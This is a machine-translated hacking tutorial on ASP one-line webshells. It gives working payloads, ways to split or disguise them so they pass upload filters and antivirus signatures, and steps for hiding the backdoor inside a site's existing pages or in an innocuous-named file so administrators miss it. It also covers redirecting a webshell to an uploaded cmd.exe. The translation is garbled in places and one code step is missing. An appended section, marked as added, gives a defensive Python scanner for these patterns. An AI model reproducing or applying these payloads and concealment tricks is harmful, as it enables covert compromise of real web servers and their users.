One-sentence Trojan kill-free processing

Source: Internet
Author: User
During further intrusion into a server, uploaded files are filtered out by the server, and the uploaded WEBSHELL will not run!

Take the minimal blue screen ASP Trojan as an example! Make the following changes.

The original code is <%ExECutE request ("cmd") %>. Replace the label with <script language=VBScript runat=server>execute request ("cmd")</Script>

This avoids the <%, %> symbol!

When the table's data field is restricted and the one-sentence Trojan cannot be written

The smallest Trojan code circulating on the network is <%eval request ("#") %>. If the connection fails, what should I do?

Just write the Trojan horse separately: <% Y = request ("x") %> and <% execute (Y) %>. In this way, separate writes are committed to the database!

However, the physical location of the newly added data in the ACCESS database is before the old data, so you must first write the <% execute (Y) %> section. After writing the password on the client, you can enter any character except "x". If you enter "x", an error will occur!

Inserting the one-sentence Trojan is prone to errors.

For example,

Sub unlockPost ()
Dim id, replyid, rs, posttable
id = Request ("id")
replyid = Request ("replyid")
If Not IsNumeric (id) or id = "" Then

is written as

Sub unlockPost (<% eval request ("#") %>)
Dim id, replyid, rs, posttable
id = Request ("id")
replyid = Request ("replyid")
If Not IsNumeric (id) or id = "" Then

You can also write it in a form with an error-tolerant statement!

<% If request ("cmd") <> "" then execute request ("cmd") %>

One-sentence Trojan to two-sentence Trojan transformation!

One-sentence Trojan server prototype: <% execute request ("value") %>,

After Deformation: <% On Error ReSuMe Next execute request ("value") %>,

Why do we need to use a Trojan Horse? It is because it makes our backdoors more concealed.

I have also tried to insert one sentence into an ASP file of WellShell, but errors often occur during access, whereas after inserting two sentences the Trojan server can be accessed normally and it has no effect on the pages of the site.

In this way, the website is more concealed. The Administrator will not delete all the webpage files.

My WellShell now has such a backdoor. When selecting the ASP file into which you want to insert the two sentences, note that you should select ASP files that can be accessed by IE, rather than inserting into files such as conn.asp.

Of course, the Client Connected to the Trojan still uses the client of the Trojan without modification.

One-sentence kill-free:

I. Deformation Method

For example, a horse like eval (request ("#")) is generally not killed. But in fact, anti-virus software often lists eval (request as a signature. So let's make some changes.

E = request ("id")
Eval (E)

In this way, the kill-free operation can be achieved.

For example: <% execute request ("1") %> after deformation:

<% E = request ("1")
Execute E %>

Of course, this kind of deformation is best done.

The second method: many administrators are very smart and will check ASP files for the execute and eval functions. No matter how you decompile it, the code will always use one of these functions to interpret and run, so it is still found. Instead, we can call it from an external file. Create a.jpg, or a file with any suffix or name that will not be noticed. Write execute (request ("#")) in it; of course, you can deform it first and then put it in. Then insert it into the ASP file.

  

To reference it.

However, the administrator can find the modified file by comparing the file, but this is not the case.
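A defender's view of the variants described above, as an added example that is not part of the original article: a small Python scanner that flags the direct form, the split form (in either order) and the `<script runat=server>` form, and that walks every file regardless of extension. The rule names, `scan_text`, `scan_tree` and the sample strings are constructed for this illustration.

```python
import os
import re

# Dynamic-evaluation sink: eval/execute in any letter case, optional "(".
SINK = r"\b(?:eval|execute)\b\s*\(?\s*"
DIRECT = re.compile(SINK + r"request\b", re.I)
ASSIGN = re.compile(r"\b([A-Za-z_]\w*)\s*=\s*request\s*\(", re.I)
SCRIPT = re.compile(
    r"<script\b[^>]*\brunat\s*=\s*[\"']?server\b[^>]*>(.*?)</script\s*>",
    re.I | re.S)


def scan_text(text):
    """Return the sorted rule names that match one file's text."""
    hits = set()
    if DIRECT.search(text):
        hits.add("direct-eval-of-request")
    # Split form: a variable filled from request(...) and evaluated anywhere
    # in the file; order is ignored because the halves may be stored reversed.
    for var in {m.group(1) for m in ASSIGN.finditer(text)}:
        if re.search(SINK + re.escape(var) + r"\b", text, re.I):
            hits.add("split-eval-of-request")
    # Server-side <script> block used in place of the <% %> delimiters.
    if any(re.search(SINK, body, re.I) for body in SCRIPT.findall(text)):
        hits.add("runat-server-eval")
    return sorted(hits)


def scan_tree(root):
    """Scan every file under root, whatever its extension (a.jpg included)."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, encoding="latin-1") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed samples: forms described on this page plus one benign fragment.
SAMPLES = {
    "direct": '<%ExECutE request ("cmd") %>',
    "split": '<% execute (Y) %><% Y = request ("x") %>',
    "script": '<script language=VBScript runat=server>execute request("cmd")</Script>',
    "benign": 'id = Request("id")\nIf Not IsNumeric(id) Or id = "" Then',
}
```

Because the rules are signature heuristics, pair them with the file comparison mentioned above: a baseline of known-good file hashes catches insertions that no pattern anticipates.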

Using the command prompt in a WEBSHELL

Then modify your WEBSHELL to find the code that calls CMD.EXE. The original code is as follows:

.Exec ("cmd.exe /c " & DefCmd).stdout.readall

Change it to

.Exec ("the absolute path of cmd.exe to be uploaded /c " & DefCmd).stdout.readall

For example, if the directory you uploaded is D:\web\www\cmd.exe, change it to

.Exec ("D:\web\www\cmd.exe /c " & DefCmd).stdout.readall
